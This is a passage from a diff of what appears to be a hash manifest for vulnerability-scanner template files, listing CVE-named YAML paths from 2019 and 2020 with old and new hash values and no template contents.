-http/cves/2019/CVE-2019-2579.yaml:eb08745002385ec2e0d196620deca526eb8680ad -http/cves/2019/CVE-2019-2588.yaml:7e42433802dccde2b47174db3ed81fc6b8a8ab0c -http/cves/2019/CVE-2019-2616.yaml:e9cf1a4d715c7a69eb9783a5a321ad647e81bcdc -http/cves/2019/CVE-2019-2725.yaml:ed427cb00780071fbb29dde142c5cfdc62e725e8 -http/cves/2019/CVE-2019-2729.yaml:fa6bcc04be43c0d7a4ad6775771b68ce853e4895 -http/cves/2019/CVE-2019-2767.yaml:c5a3a2db82ab52398aaa2ca5d5760e5a2b4ea2b3 -http/cves/2019/CVE-2019-3396.yaml:f0182df6989565302721c5261da7716648f661a7 +http/cves/2019/CVE-2019-20210.yaml:d784fef4c38019870824033d266db86f1833cb15 +http/cves/2019/CVE-2019-20224.yaml:5a4643fc7a87c04c79db835f82d32a1714d7861e +http/cves/2019/CVE-2019-20933.yaml:faad7abd3d029edb877ff65e2fd7639b1941cbc9 +http/cves/2019/CVE-2019-2578.yaml:7e76281c2a895eb575e335fbe38cf635f93fe35d +http/cves/2019/CVE-2019-2579.yaml:722654ad65c4100c847921d4594dfb1c2da35d84 +http/cves/2019/CVE-2019-2588.yaml:efffc41ce63b879a3a8585216077c6a65753cb70 +http/cves/2019/CVE-2019-2616.yaml:c76d1446ba82180efff59f446bda4a52925b297f +http/cves/2019/CVE-2019-2725.yaml:f0c1ee7b18f37563af1f6172db5b035c22127483 +http/cves/2019/CVE-2019-2729.yaml:f846b3f8f39ed550d331bbc4b04bb2e17f13be9d +http/cves/2019/CVE-2019-2767.yaml:f0f534b2139d6dcc57579d4d8579d6d1164ac844 +http/cves/2019/CVE-2019-3396.yaml:7ce7d31bce963396606c37ad7435ccef580e424d http/cves/2019/CVE-2019-3398.yaml:442e05f4c1b26785156f7c241facc790c3314a50 -http/cves/2019/CVE-2019-3401.yaml:159e749412e172e98f3692203880122f9c7b4cf6 -http/cves/2019/CVE-2019-3402.yaml:1730d28e491c9f44cc76434b58a8aa686ed6977a +http/cves/2019/CVE-2019-3401.yaml:5e63af4f331348cf2da42db41b9016947f91a590 +http/cves/2019/CVE-2019-3402.yaml:13f7265101996091a106b641e3f4dc32cd1a76dc http/cves/2019/CVE-2019-3403.yaml:e640a15078f20fe9893353da38d6b824bbc1bc2d -http/cves/2019/CVE-2019-3799.yaml:8646d1b26c783c09359ef4f5bcee5c1669a31881 -http/cves/2019/CVE-2019-3911.yaml:5e613749d94f142ff4010f68951547a6eef1a349 -http/cves/2019/CVE-2019-3912.yaml:197e08afb0bf5d56d82bb233d206f05a51b243d0 -http/cves/2019/CVE-2019-3929.yaml:1d5102ef6d79e6554cf5af97895f23997fc1329e -http/cves/2019/CVE-2019-5127.yaml:53f57db6b4469242167505c2bd074948e5666a85 -http/cves/2019/CVE-2019-5418.yaml:47fbb4091b9a548b4f85f7bbd664dca2d67c6dff -http/cves/2019/CVE-2019-5434.yaml:e83c4a2f5cc0df64db1a0f03ecf4c3e8b82a7510 -http/cves/2019/CVE-2019-6112.yaml:f654472fcc9ebdb7f2c4cc71dd12a75f7e2b1669 -http/cves/2019/CVE-2019-6340.yaml:0bae4434b6a4879fc629e09083b15803e28e6409 -http/cves/2019/CVE-2019-6715.yaml:9f85209ae6ae3408dd5cf47434d2189146c828f5 -http/cves/2019/CVE-2019-6799.yaml:64aa4e04828cc962d674cd41d0750e1917fce21a -http/cves/2019/CVE-2019-6802.yaml:0566f258e19351febfe8765f8ef99453e8f69456 -http/cves/2019/CVE-2019-7219.yaml:469562e696051f22ae2b09a8112be26efe288fad -http/cves/2019/CVE-2019-7238.yaml:ff9d5b04c6e2aef0a10ecdf8425296500b042b45 -http/cves/2019/CVE-2019-7254.yaml:b9310fa6aba91031c5db6ad9638c7ba23888ddce -http/cves/2019/CVE-2019-7255.yaml:e58644bd683d1dbc2a4bdf12dd8fe7dc35ae7a3f -http/cves/2019/CVE-2019-7256.yaml:0ed4ea7d00f6575010812eb703a1232dd2146645 -http/cves/2019/CVE-2019-7275.yaml:8fc4c60569df00f15a1d18a294e4b8735a29a4c8 -http/cves/2019/CVE-2019-7315.yaml:01c958984d80e5b4ff9e09dec9016eb2550095de -http/cves/2019/CVE-2019-7481.yaml:f4544595557126e843a6ba0108d7150250bb43fe -http/cves/2019/CVE-2019-7543.yaml:03d86a2bfa6d482be5cdd622a6640d89165d3bdb -http/cves/2019/CVE-2019-7609.yaml:ff92cdf6e1874fb416055e79c3ae317be08ae2ae -http/cves/2019/CVE-2019-8086.yaml:9f819a3520502f0293b7fd33ec59a198574b65c5 +http/cves/2019/CVE-2019-3799.yaml:00d5cfc0dba5d807276fb72c20759fa8d0f99190 +http/cves/2019/CVE-2019-3911.yaml:66b44ed4a8d5046e4ab53c541d9ee90db57cafe6 +http/cves/2019/CVE-2019-3912.yaml:c97c39b1b04348333f4b7ac639b26603cce5a2d5 +http/cves/2019/CVE-2019-3929.yaml:5e057a4216d9c84fea1e1b4fc11ea5d947341fba +http/cves/2019/CVE-2019-5127.yaml:f27fb51d7f20cf297c081fa68f7b868c1b455a78 +http/cves/2019/CVE-2019-5418.yaml:87c70e18b15a75a283b6891465205cc564fda34f +http/cves/2019/CVE-2019-5434.yaml:323aabba8368dce0a35057aaf3e138e09fdfef04 +http/cves/2019/CVE-2019-6112.yaml:b3831059327a32ad808eea77f4a17a35328eb493 +http/cves/2019/CVE-2019-6340.yaml:72b58d47defa347a86c5b60de3996bfd6a628cbd +http/cves/2019/CVE-2019-6715.yaml:bd7247692a106e0499e0211846cab6d950e6d763 +http/cves/2019/CVE-2019-6799.yaml:2521456ddc2a8ad7d58850149d3cadae436bee47 +http/cves/2019/CVE-2019-6802.yaml:0fbcfd668ab064597df14f77843cc4a9419c23a8 +http/cves/2019/CVE-2019-7219.yaml:2972f56a180017f35740c29e9178f25a92e4c8d7 +http/cves/2019/CVE-2019-7238.yaml:3af3844443b27bb1abdb0e71acc66b7577d577c4 +http/cves/2019/CVE-2019-7254.yaml:5ed97bab59c7c14a046fa2373a489efe83d78db0 +http/cves/2019/CVE-2019-7255.yaml:1c718ff086e43ef521d55ca2eadc62110f0c1072 +http/cves/2019/CVE-2019-7256.yaml:f339bd37f1ccd34418956d140c31655026590a3f +http/cves/2019/CVE-2019-7275.yaml:47cc6e60a43cb34f2578f61b8547b1e6d086f376 +http/cves/2019/CVE-2019-7315.yaml:9710ffeb29efaa2b88bf5169278f552e854bcc94 +http/cves/2019/CVE-2019-7481.yaml:26ee5046086c604ee58ffa39c194d94267427217 +http/cves/2019/CVE-2019-7543.yaml:e2619658b8a469947fd63aade064708fe2a215a9 +http/cves/2019/CVE-2019-7609.yaml:f3fa8fd02224b1157c94dc1d0e521ad440bcc7c4 +http/cves/2019/CVE-2019-8086.yaml:9abb83d583c01c848a62d6bc360bbe26a2266de3 http/cves/2019/CVE-2019-8390.yaml:df758b973c09a732b12962df89c9b3d2c7182ec6 -http/cves/2019/CVE-2019-8442.yaml:eb4f5d3b24860e8fde5108201f2408ec95e69038 +http/cves/2019/CVE-2019-8442.yaml:74b329b132ba1538274cff4e5bca872815efe27b http/cves/2019/CVE-2019-8446.yaml:a9fc78750e0ab7ff75eef71e2c602796163fc55c -http/cves/2019/CVE-2019-8449.yaml:398dea3d2f474ce51c1ae3f5b292565635d007a6 -http/cves/2019/CVE-2019-8451.yaml:0e7651d96b7aecc252fcae89760700478e82712d -http/cves/2019/CVE-2019-8903.yaml:b94209da75b2a4887f835dbe04bc7f4e25fcb1dc -http/cves/2019/CVE-2019-8937.yaml:a55b3b870c18450b965a118f578f9871c16d13c3 -http/cves/2019/CVE-2019-8982.yaml:68af35de6c39a25023315e75164455102fd72042 -http/cves/2019/CVE-2019-9041.yaml:3595d00cc90226ba2dfd29ec70a35e9a17a63254 -http/cves/2019/CVE-2019-9618.yaml:ea31141c7c4ce329ecccf48ce66dd64b262b7830 -http/cves/2019/CVE-2019-9670.yaml:a8b54e97cfb8c57ed82c968bbe22bf4985c95b84 -http/cves/2019/CVE-2019-9726.yaml:0dc5e9d3d2e02d0452ba479d62051faddcecddeb -http/cves/2019/CVE-2019-9733.yaml:6d9a970d26d91d5bb04b20a5162094d979e80a37 -http/cves/2019/CVE-2019-9915.yaml:12c0391466ebd091f2a0e0ee75dea17e3bed7933 -http/cves/2019/CVE-2019-9922.yaml:bfb994682be31292df432fc2760a90e106741a8f -http/cves/2019/CVE-2019-9955.yaml:ad5b68e1570cf6a08c449fcdca9438c24fdeaa83 -http/cves/2019/CVE-2019-9978.yaml:bceadb471d131e94bc8de9703c9d528f67a8d6a4 -http/cves/2020/CVE-2020-0618.yaml:d74a6f2851097e10c052c5555b931dac66ec9c61 -http/cves/2020/CVE-2020-10148.yaml:b8a94ca16f1add698d6ad4d8d73bfc68806de75c +http/cves/2019/CVE-2019-8449.yaml:00277ff0de4aaec551f63b5e5b2aa0981c011c13 +http/cves/2019/CVE-2019-8451.yaml:ee3a3deb1a5e5fc6b70f47a6fad49e9f421337ca +http/cves/2019/CVE-2019-8903.yaml:0fbd08de0e323500214ae5f8d650a775e2f88ddf +http/cves/2019/CVE-2019-8937.yaml:ec8a2b02ba6c8f354cd35e7b5174755ab1f134a9 +http/cves/2019/CVE-2019-8982.yaml:89555f956b3c10bfee5e8101d2695e9e8a2000ee +http/cves/2019/CVE-2019-9041.yaml:003f4fa4a103bd75423da07695333f1b65e90a38 +http/cves/2019/CVE-2019-9618.yaml:f028388d01f5bc9c4d3f5aba48603806a0455687 +http/cves/2019/CVE-2019-9670.yaml:28907516d576668867bcf855351ea96cb07f4327 +http/cves/2019/CVE-2019-9726.yaml:8c82dbab9c7977f03a28ee8b3dc3d377b09d09f8 +http/cves/2019/CVE-2019-9733.yaml:b374230e562e2cfaa04fa750f25b2558ae3cd8f8 +http/cves/2019/CVE-2019-9915.yaml:86e051a836bbf6dfd5f8b9a18c622f17493ba7dc +http/cves/2019/CVE-2019-9922.yaml:f6829aa0ab293c7cbe77d516a10e61b1adec8ac9 +http/cves/2019/CVE-2019-9955.yaml:ca55b4a6645c29026ce5190fde351707b4e226e5 +http/cves/2019/CVE-2019-9978.yaml:f4064e683c800397cf6d9ab07ac60490ed8e6ab8 +http/cves/2020/CVE-2020-0618.yaml:e8fc9e16024b638ffcc718e54744e78dd1f0d034 +http/cves/2020/CVE-2020-10148.yaml:9cb364b8252f3b0271125778d58bd12339da8036 http/cves/2020/CVE-2020-10199.yaml:038bc219ad91efdc0d390041f8daacb33820dca0 -http/cves/2020/CVE-2020-10546.yaml:eaedc3b26c354dd731e695afa50b0c19de35c1be -http/cves/2020/CVE-2020-10547.yaml:2a23052ce827a40a110e508d9d249f4a99e3c8dd -http/cves/2020/CVE-2020-10548.yaml:03333037b97ea0ec579583e13517135d82e45c63 -http/cves/2020/CVE-2020-10549.yaml:4b6cf1f3425ce80b29441c6ac4a46f42afb9f898 -http/cves/2020/CVE-2020-10770.yaml:7f54eaa97fc0f90d6f957e42feea299ee2a2e669 -http/cves/2020/CVE-2020-10973.yaml:031f367245ae5b6a4c7e6e550969c25e91443e1d -http/cves/2020/CVE-2020-11034.yaml:bc2d4ac5c6a444311eb08789833014417eeea3d0 -http/cves/2020/CVE-2020-11110.yaml:0a35f9fbea43aa35765014648936b19175d856eb -http/cves/2020/CVE-2020-11450.yaml:5b6d4403b2fa4512544dd5c3ef82260ac1abfb97 -http/cves/2020/CVE-2020-11455.yaml:0099d221cee52df34279cd07320c04948d3eac4f -http/cves/2020/CVE-2020-11529.yaml:c205fee97734110b9354ceb341f3aadc09005c66 -http/cves/2020/CVE-2020-11530.yaml:e61bb2e9eef89eb27268feecb8849044f301dbb2 -http/cves/2020/CVE-2020-11546.yaml:b5ac6955be9eae2cca418f2ad165a7d7e4bf9a4c -http/cves/2020/CVE-2020-11547.yaml:8d8fec2ec0e1b0aa82f62ea990d44ffe963aaa44 -http/cves/2020/CVE-2020-11710.yaml:49e83a2b6649a860b00eab20ef03df48615918ac -http/cves/2020/CVE-2020-11738.yaml:1a8d9fb75fc3a13ac87e8576b3397bd77fd4f4d5 -http/cves/2020/CVE-2020-11853.yaml:7ce0eef0e5846bbaa53fa270ccab17afbd894374 -http/cves/2020/CVE-2020-11854.yaml:a2759dc5a7a0e6f1f8e11fe9eb0ae740cfd2630c -http/cves/2020/CVE-2020-11930.yaml:fcc579e35258e992349183c3f34ed07319dc7f69 -http/cves/2020/CVE-2020-11978.yaml:9992f5347362e46184f28ae12163d4ec18a7f2e5 -http/cves/2020/CVE-2020-11991.yaml:9995f4fc8f0e9462de1fa75e56b0d692ab1de31c -http/cves/2020/CVE-2020-12054.yaml:3b7646b2210eccb9bf3f96ca1c4f48f42ff8161b -http/cves/2020/CVE-2020-12116.yaml:4cbca4c5dcc717753a41dd5aaf3f4e3b43a8b9e1 -http/cves/2020/CVE-2020-12127.yaml:d16bc71ce59b802a28e83c1810a8979bd0512fd2 -http/cves/2020/CVE-2020-12447.yaml:42ecd1f0d9ad96484113ae4f3d34ba0d08220c1b -http/cves/2020/CVE-2020-12478.yaml:76ab6cb03973e0ab0d9fa23b87642b392a0d4c88 -http/cves/2020/CVE-2020-12720.yaml:3f80125f3fe60b1dc8c6d09785b8f1917c83a00e -http/cves/2020/CVE-2020-12800.yaml:8426133e6dc7301fd5583dad4f1a4223da3bf37b -http/cves/2020/CVE-2020-13117.yaml:9bcae6edb8602a43f0878e254850d89f38c95ab8 -http/cves/2020/CVE-2020-13121.yaml:f25caff58688b959396f4456b881bb576673ed16 -http/cves/2020/CVE-2020-13158.yaml:5987e1af31299fc58254655a147450518c87b941 -http/cves/2020/CVE-2020-13167.yaml:4a6b0f9f30cb520f5b76f54a44a230d01291b52d -http/cves/2020/CVE-2020-13258.yaml:cfa0b4cbb8065ce44ff15d59c8537480b8669f32 -http/cves/2020/CVE-2020-13379.yaml:7ec9f44f906859ea498b5876e85adef13cde8df2 -http/cves/2020/CVE-2020-13405.yaml:4a16f64a3f97ae8420acd7e5dc1eb0c4c909c061 -http/cves/2020/CVE-2020-13483.yaml:98f6bd81f510114743a985c66e03d8ad535d7bc6 -http/cves/2020/CVE-2020-13700.yaml:1a6d116d008436274a6b2ab747e582ead3dbcc83 -http/cves/2020/CVE-2020-13820.yaml:04dffa65726fa0ed870d75eb03517f41487ccc17 -http/cves/2020/CVE-2020-13927.yaml:0de285e84cfb9c52e605119dba59d024b508e75f -http/cves/2020/CVE-2020-13937.yaml:44a4c9652e64918347d6a92d6849eba072c1b753 -http/cves/2020/CVE-2020-13942.yaml:3c654518d71c898b5969c9cbba4b8d9944ad9113 -http/cves/2020/CVE-2020-13945.yaml:1846383c22e82e085a4e0bb55521fcfe51c0c5ff -http/cves/2020/CVE-2020-14092.yaml:a43d560ca2bdeb83527b1bcd1b1c6b24073247c1 -http/cves/2020/CVE-2020-14144.yaml:43328a2df2df46e60ce98b45121a0cbd5f32e65c -http/cves/2020/CVE-2020-14179.yaml:6447baa5616d27410380bae0b087a854161fa3b2 -http/cves/2020/CVE-2020-14181.yaml:fea5cc18556a24983dac2a85861cc26f2cb79b23 -http/cves/2020/CVE-2020-14408.yaml:4aab11a6e9bb21c796484c7bab08d9b74c4a3f51 -http/cves/2020/CVE-2020-14413.yaml:95478446d73668ed451b18f2b1a1dd0987645660 -http/cves/2020/CVE-2020-14750.yaml:79cfec70399f14f026a0497f8fbe7801ab2d7e40 -http/cves/2020/CVE-2020-14864.yaml:adf3ed7c68cf0b7ab957784a9c754d2e9de8d9f9 -http/cves/2020/CVE-2020-14882.yaml:281478487ff4b2e11831868a4059a456d69fee57 -http/cves/2020/CVE-2020-14883.yaml:f0b2c21b9db92cf96197a7b65489049faecee143 -http/cves/2020/CVE-2020-15050.yaml:6a9b3f4edcbabef90fae353affc89671e5329428 -http/cves/2020/CVE-2020-15129.yaml:3ab95e228c75073122f7f0e27542caad0c35919e -http/cves/2020/CVE-2020-15148.yaml:cf48bb7b5757fe04674606000981a0ec28fc2693 -http/cves/2020/CVE-2020-15227.yaml:8e6a12a255a175d6445040aa07bdb1a35784a427 -http/cves/2020/CVE-2020-15500.yaml:bcc3d5215e817c4c99ba3347dc17dd63dd0ff417 -http/cves/2020/CVE-2020-15505.yaml:637134bf53d3007ca1b841a4f70f3e4b616b8082 -http/cves/2020/CVE-2020-15568.yaml:55c1fa927a9621309596eb851d307bebf06c9ba0 -http/cves/2020/CVE-2020-15867.yaml:5224bb083c579f2f9a723ed69c896e8663c69338 -http/cves/2020/CVE-2020-15895.yaml:0d017a8d86eb3966b0edf40362e4df9f5c1710eb -http/cves/2020/CVE-2020-15920.yaml:a9698c87cf8d0fd8c3abb1abe3b4965cbf79e46e -http/cves/2020/CVE-2020-16139.yaml:dab85e59487f8569d492411050321a7b054820e9 -http/cves/2020/CVE-2020-16846.yaml:5e3a0075794825a0dd34a20d014942258a4b3e84 -http/cves/2020/CVE-2020-16952.yaml:505f1c44e4f6a556a0992a233c8b4c00e529ff3e -http/cves/2020/CVE-2020-17362.yaml:b6f82648dbbd0feb35025a1267dd6a98d830907c -http/cves/2020/CVE-2020-17453.yaml:39816b485e7cd3287c60d0768daaec5ccb62240e -http/cves/2020/CVE-2020-17456.yaml:ce5c4510b1026e634673192108c6b116d8d0e920 -http/cves/2020/CVE-2020-17496.yaml:b297b78680644e43b7e133f332b60a9a801b768a -http/cves/2020/CVE-2020-17505.yaml:4248a4f9ccc30e15e883e1c077db31ae03f02c67 -http/cves/2020/CVE-2020-17506.yaml:f6367d706f86772befa64be784b37509980b5545 -http/cves/2020/CVE-2020-17518.yaml:f5ebc5bf2d79e7f518b1b0e3c89bbc414b7b9bed -http/cves/2020/CVE-2020-17519.yaml:6bc006f55091e4d997565baa24d981da7aa71830 -http/cves/2020/CVE-2020-17526.yaml:c5e506b85a10a62fd006fe40fa8cd4fb0609645a -http/cves/2020/CVE-2020-17530.yaml:1919f143f2cda18c25291b369a8fe0a69dd58a00 -http/cves/2020/CVE-2020-18268.yaml:1cf8b66327d21f4863cd72fc65fba8c8d7ccb18f -http/cves/2020/CVE-2020-19282.yaml:56547968333d58ce186cbba53e45e0612eacd6fe -http/cves/2020/CVE-2020-19283.yaml:91f8003c70f19ac40a5acac6bbc90f12da3957ad -http/cves/2020/CVE-2020-19295.yaml:9f151563a1ef88830dc986ea3b6ddbf3b71745d0 -http/cves/2020/CVE-2020-19360.yaml:d932ffbeec184402dd78c0dbf8bea7b1383e1b5d -http/cves/2020/CVE-2020-1943.yaml:3b7bbd34383606c5508656a3468851cdadc7131e -http/cves/2020/CVE-2020-19515.yaml:06c45109f4474f595b237a1f97c6603214ba76bf +http/cves/2020/CVE-2020-10546.yaml:c4d463faf868bdb31324addb223d06b3e8b506a4 +http/cves/2020/CVE-2020-10547.yaml:04a1258550c38088552fc6b1f262c9212ecd882e +http/cves/2020/CVE-2020-10548.yaml:6ffd3491848d546c335df8f521ed3717b3ad4214 +http/cves/2020/CVE-2020-10549.yaml:376adbca8a298dd6e178a6f852b592eeae3c1a53 +http/cves/2020/CVE-2020-10770.yaml:a0da8aab5415352b4852752c443eb5347acc8235 +http/cves/2020/CVE-2020-10973.yaml:783b9d86f2e81cb231e438b8e124ea37fbfa0795 +http/cves/2020/CVE-2020-11034.yaml:27a38e6a6f0a752ea46422235388768d20978d04 +http/cves/2020/CVE-2020-11110.yaml:f7c2d1951bbd1accf76d01d2c695c6dd6d615f40 +http/cves/2020/CVE-2020-11450.yaml:72b1ffc9911feaa7bcc8f1071cff8c07a50f69d8 +http/cves/2020/CVE-2020-11455.yaml:dd3b6e1f1cc5ca8080305d8888918e315c276ed5 +http/cves/2020/CVE-2020-11529.yaml:7961fdf3ccb2c43dc0bbf1494c702f52971abde9 +http/cves/2020/CVE-2020-11530.yaml:7a69580993d257aedb22a70b5f993ec69c40dc7d +http/cves/2020/CVE-2020-11546.yaml:11ba4dd23a38f8a385e330051e21907c1681a9a3 +http/cves/2020/CVE-2020-11547.yaml:0a8976a9e1ab24aa62924437682e68d1d6429491 +http/cves/2020/CVE-2020-11710.yaml:ac968b3aafc15764eb46feb8c66462244c5c31c1 +http/cves/2020/CVE-2020-11738.yaml:14923e2574284332271c03ee043bc02e7d699269 +http/cves/2020/CVE-2020-11853.yaml:359809e239c0c6986caf07c3180e87d7b54e5ea6 +http/cves/2020/CVE-2020-11854.yaml:5ff865d4ea53ee3168674df66849c8dfae1a5020 +http/cves/2020/CVE-2020-11930.yaml:ba4bb5bb11671094160c864be9f001dfab3600b8 +http/cves/2020/CVE-2020-11978.yaml:45b9d4184f653cd73c531c16f9be5bd029594b36 +http/cves/2020/CVE-2020-11991.yaml:d5bc51772168c70166192544d5a6dd525f481000 +http/cves/2020/CVE-2020-12054.yaml:daf2b9c3495fb394477188bb444ab1fb6dc7c2a9 +http/cves/2020/CVE-2020-12116.yaml:0455b6f70a1117d81ae65b603d181978e145c13f +http/cves/2020/CVE-2020-12127.yaml:6a0c02162189886a44cf29fd731d4821294205b3 +http/cves/2020/CVE-2020-12447.yaml:6acf6df545a287f3ac60495c8ba195c7582c9248 +http/cves/2020/CVE-2020-12478.yaml:19d6adf2cced616412bc625122fe337f84be3980 +http/cves/2020/CVE-2020-12720.yaml:793a2589f0c42d77d9f52793e4ab0d9a4619627e +http/cves/2020/CVE-2020-12800.yaml:c954d6cdb837f36f4d45db7530916dc12bf5618e +http/cves/2020/CVE-2020-13117.yaml:908d769ed5fd4931c978b3c96aa451952da03e0e +http/cves/2020/CVE-2020-13121.yaml:98224f1cfe53b89a68cbfff7ea2661ef828131a4 +http/cves/2020/CVE-2020-13158.yaml:ac7fc6a4b4f589ae119d110bd79f61f7b9a0f941 +http/cves/2020/CVE-2020-13167.yaml:e08c2b8197cae65b237d0e75858d6167c9ee1caf +http/cves/2020/CVE-2020-13258.yaml:5908e0a2f09d503a2dcb3abacc55d3b4468ca9b2 +http/cves/2020/CVE-2020-13379.yaml:f543788cccc37e511895e9b9875d1d52aeda83a7 +http/cves/2020/CVE-2020-13405.yaml:3920ad110fd7a144c545e512e080199438785414 +http/cves/2020/CVE-2020-13483.yaml:6d7e8d207687d3462e0a47350002fb7c15913417 +http/cves/2020/CVE-2020-13700.yaml:62a81c39be3f0c69e82e8a54001ae4cd8004d0c9 +http/cves/2020/CVE-2020-13820.yaml:1dc6ae7ee746926749828b6f534b76c5d8c6e46d +http/cves/2020/CVE-2020-13927.yaml:8c0082eabf2797dd9d564eca157a3588a0bd14bc +http/cves/2020/CVE-2020-13937.yaml:ea4cc5644c35436e6137686572ba218cb7301899 +http/cves/2020/CVE-2020-13942.yaml:b06e5f38e786a8498dc633453dfe15b82f5a6407 +http/cves/2020/CVE-2020-13945.yaml:4918c21141eba82d907e5c8165db3117ab5019f5 +http/cves/2020/CVE-2020-14092.yaml:ce842f5f7251d0cdb900910b089aba20239dce0a +http/cves/2020/CVE-2020-14144.yaml:c500b7c26498fa19e6d223fe7c8238094ed2e83e +http/cves/2020/CVE-2020-14179.yaml:786620e58c81d3b029ccecee03fe83997a38141f +http/cves/2020/CVE-2020-14181.yaml:fae9b414b5d027dacca7268648b4e11ba039d3d6 +http/cves/2020/CVE-2020-14408.yaml:8e6afe405ea0e7cd028b9eea7cf270e1babd010a +http/cves/2020/CVE-2020-14413.yaml:d122a0c97314e510e477d5d247231e1036d93dcc +http/cves/2020/CVE-2020-14750.yaml:e77e612e1d3cea7e99182a375ba079235b49f35f +http/cves/2020/CVE-2020-14864.yaml:45d561099667356a60b0c9a26bf9d3106d357489 +http/cves/2020/CVE-2020-14882.yaml:5b6bda8d356edb46454d3b4d66d9ae1a5879858f +http/cves/2020/CVE-2020-14883.yaml:644868f68086c909f6257fee318d1be57c871558 +http/cves/2020/CVE-2020-15050.yaml:509d96becae12823dc20f166f76023f3cf5dbfc1 +http/cves/2020/CVE-2020-15129.yaml:a5a3d09f39299cc161a0dd5c3e8239121ed572f3 +http/cves/2020/CVE-2020-15148.yaml:a2192f9591ed68790cf975c12ecbb83a4bab2e45 +http/cves/2020/CVE-2020-15227.yaml:d3e6c3ea2b34358db35f8f7bcc91279da0061967 +http/cves/2020/CVE-2020-15500.yaml:9b60741ed4809c52816f0e89aa1702c896e4487a +http/cves/2020/CVE-2020-15505.yaml:34b8fd39a72e63aee1bf848f83fea862124ed5a1 +http/cves/2020/CVE-2020-15568.yaml:ef81a4dca4de8b49aa83000d97cc2c9cef611fb9 +http/cves/2020/CVE-2020-15867.yaml:b53649b4ca4729ac941a5e8fb28a93806e5a43aa +http/cves/2020/CVE-2020-15895.yaml:ce2995b122ce954393d2d914ce70809593e5726c +http/cves/2020/CVE-2020-15920.yaml:58843a7621a50f4f9ae1b7c63928809ee51ba3b0 +http/cves/2020/CVE-2020-16139.yaml:2dc55fb77dc79c9f9af61bbad006ae88bdf0b4c3 +http/cves/2020/CVE-2020-16846.yaml:0a73546ad31b14fc9eb1b8d873a2d892dda80217 +http/cves/2020/CVE-2020-16952.yaml:c44bd7f8929734a6fe2ffbde6a85d7f890a07ec8 +http/cves/2020/CVE-2020-17362.yaml:6b4901da3b34f9cf0fc056a2c985f4fa4ca0ef1c +http/cves/2020/CVE-2020-17453.yaml:de16ea03fb941fc8712776f0ce6c8718b2684507 +http/cves/2020/CVE-2020-17456.yaml:909b8b48d48d9e7704dbc8a0e2df587a1ac31c91 +http/cves/2020/CVE-2020-17496.yaml:94c9f8e4dc3b52915a53cad6e62e36ab6fb0beba +http/cves/2020/CVE-2020-17505.yaml:c5ebc981a21494069aa553221aec3f3b2c7045f4 +http/cves/2020/CVE-2020-17506.yaml:d68188109ebb5d92e1e18d9fc6abef6895240ddb +http/cves/2020/CVE-2020-17518.yaml:fd6b9d1cbae9427f589299b77484743c7bc0ced0 +http/cves/2020/CVE-2020-17519.yaml:91c35ffbdf6a19552aecdedb84cdd796d419e98d +http/cves/2020/CVE-2020-17526.yaml:ccb475f2753160c3c020169fc6a79e738859104e +http/cves/2020/CVE-2020-17530.yaml:63282ae3d60aa5d25630f3b27faf54b03f1e6fa5 +http/cves/2020/CVE-2020-18268.yaml:1b89a175848659267a7fa7aba9b5d5f8d1353d4f +http/cves/2020/CVE-2020-19282.yaml:f401506fe7caa94681f4a7ac46c104908d0d428f +http/cves/2020/CVE-2020-19283.yaml:d680742908c2c2f5144c01344d636abb03dca906 +http/cves/2020/CVE-2020-19295.yaml:e56a08b7ac607ba5a537556e75c9c0f1b5deccc5 +http/cves/2020/CVE-2020-19360.yaml:da55d98efc709e605e1be913a0550603a9384178 +http/cves/2020/CVE-2020-1943.yaml:d7993f8d00d2f8c1266c978c597955a7c99ecbd0 +http/cves/2020/CVE-2020-19515.yaml:5ca11d49a555e4e09a748d2743f3c2e99dfd751b http/cves/2020/CVE-2020-1956.yaml:2375aa3be74c5b636fd0eb664274d0276582e695 -http/cves/2020/CVE-2020-19625.yaml:3e3bbf77b8fa2ac8d655431e5449fee42100a0db -http/cves/2020/CVE-2020-20285.yaml:151a9399bca0eeb752e212c9968c55fcaad7e8b0 -http/cves/2020/CVE-2020-20300.yaml:42c4ad0589282e003487dad4925c543b0c772a53 -http/cves/2020/CVE-2020-2036.yaml:7cced7e4da33bcf839509e4f595ed4c028c82e70 -http/cves/2020/CVE-2020-2096.yaml:ac59b4b0b4a7b603581b2753c4038a0af9a9dbba -http/cves/2020/CVE-2020-20982.yaml:979fa75de3fbae01409fc0fe4fab8bdde44365cb -http/cves/2020/CVE-2020-20988.yaml:568467e165a25d086cb57c581d0eece0bcb0fd39 -http/cves/2020/CVE-2020-21012.yaml:daa561c8d57b2b8be7627f346621e0094c7fb0b6 -http/cves/2020/CVE-2020-2103.yaml:7ceb1faccec7773548ca93f4699c78114544b8ef -http/cves/2020/CVE-2020-21224.yaml:3f80c44283b6819a91f92b2a512e4452c3f60994 -http/cves/2020/CVE-2020-2140.yaml:55a81b30d3209df8c5b1e1d1a00d3c7d70f68d99 -http/cves/2020/CVE-2020-22208.yaml:387fe27be4277a84d417f1ea8a25d03d2c728c9d -http/cves/2020/CVE-2020-22209.yaml:92077d19b1d403d93a41ed58f87281b6155dc0d6 -http/cves/2020/CVE-2020-22210.yaml:45b05e6a0ee0b5a28e461ba5d72d351a398ddc9f -http/cves/2020/CVE-2020-22211.yaml:044e06aa9d2d6bbf9f4ad0bb34dfd866fddbe591 -http/cves/2020/CVE-2020-22840.yaml:0d8588d065ea691e1041863339474ace6b2d4e24 -http/cves/2020/CVE-2020-23015.yaml:0915eb50c842445a938ac56aab384323950f833b -http/cves/2020/CVE-2020-23517.yaml:33b667b0d1a20cf34cc3f35a784d6a744fd200f5 -http/cves/2020/CVE-2020-23575.yaml:24659de3930fd8dca762d607f15801fb27c47fa7 -http/cves/2020/CVE-2020-23697.yaml:4fd1fcc31ec48e2771f37732d31a1d4094fd76cf -http/cves/2020/CVE-2020-23972.yaml:86f0461aab638510be774d4586f064a1d4068131 -http/cves/2020/CVE-2020-24148.yaml:67d31efc4ecd8492c56a328716cb100d66b20604 +http/cves/2020/CVE-2020-19625.yaml:42e7fcd481db6231afd1be248b92711c9f1ec68a +http/cves/2020/CVE-2020-20285.yaml:016122b226a511c92280b0f04ce2e7ded19b4f1b +http/cves/2020/CVE-2020-20300.yaml:5f786dd20a01ac447e51ab08527c2c0efcb4a0b6 +http/cves/2020/CVE-2020-2036.yaml:762f4a10fb8b7e9c6eea7878c93c787e810a4c5a +http/cves/2020/CVE-2020-2096.yaml:66e70b34518dd3f0f36554a34b64a7179ca19d7c +http/cves/2020/CVE-2020-20982.yaml:769ac187f71571bcaeb3713ffcaad5e38aea548e +http/cves/2020/CVE-2020-20988.yaml:afd2df8015a97c3eb334539d2249cc4ab1c33e77 